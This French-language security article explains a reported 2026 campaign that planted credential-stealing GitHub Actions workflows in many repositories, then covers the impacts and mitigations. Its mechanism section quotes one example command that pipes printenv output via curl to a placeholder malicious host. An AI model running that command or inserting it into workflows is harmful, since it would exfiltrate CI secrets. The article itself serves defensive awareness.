Contexte de la campagne

En octobre 2026, The Hacker News a publié une alerte indiquant que des workflows GitHub Actions conçus pour voler des identifiants ont été introduits dans des dizaines de milliers de dépôts. Le signalement provient d’une analyse automatisée qui a détecté des fichiers .github/workflows/*.yml contenant des instructions suspectes. Aucun chiffre exact n’est fourni, mais le terme « tens of thousands » confirme une portée largement supérieure à quelques milliers de projets, ce qui suggère une campagne à grande échelle.

Mécanisme des workflows malveillants

Un workflow GitHub Actions s’exécute sur des runners provisionnés par GitHub ou auto‑hébergés. Chaque job hérite des secrets déclarés dans le dépôt, accessibles via les variables d’environnement ${{ secrets.* }}. Les acteurs malveillants exploitent ce mécanisme en insérant une étape qui lit ces variables puis les transmet à un serveur externe, souvent via curl ou wget. Le fichier YAML typique comporte une action run exécutant une commande du type curl -X POST -d "$(printenv)" https://malicious.example.com. Cette technique ne nécessite aucune permission supplémentaire, car les secrets sont déjà disponibles pour le runner.

Impacts potentiels sur les projets ciblés

Le vol d’identifiants expose les dépôts à plusieurs vecteurs d’attaque : accès aux registres de conteneurs, injection de code dans les pipelines CI/CD, et compromission de services cloud associés. Même si les secrets sont limités à des jetons d’accès ou des clés API, leur divulgation peut permettre à un attaquant de déployer des charges malveillantes dans l’infrastructure du propriétaire du dépôt. L’article ne précise pas les types de secrets ciblés, mais la portée du phénomène implique que des projets de toutes tailles, y compris des organisations publiques, peuvent être affectés.

Mesures d’atténuation et bonnes pratiques

Face à cette menace, les équipes de développement doivent auditer leurs répertoires pour détecter les workflows non autorisés. GitHub propose des alertes de sécurité qui signalent les modifications de fichiers de workflow, mais il est recommandé d’activer la protection des branches et d’exiger des revues de code pour tout ajout dans .github/workflows. La rotation régulière des secrets et l’usage de secrets à durée de vie limitée réduisent l’impact d’une éventuelle fuite. Enfin, l’intégration d’outils de scanning de configuration YAML dans le pipeline CI peut identifier les modèles de commande suspecte avant leur déploiement.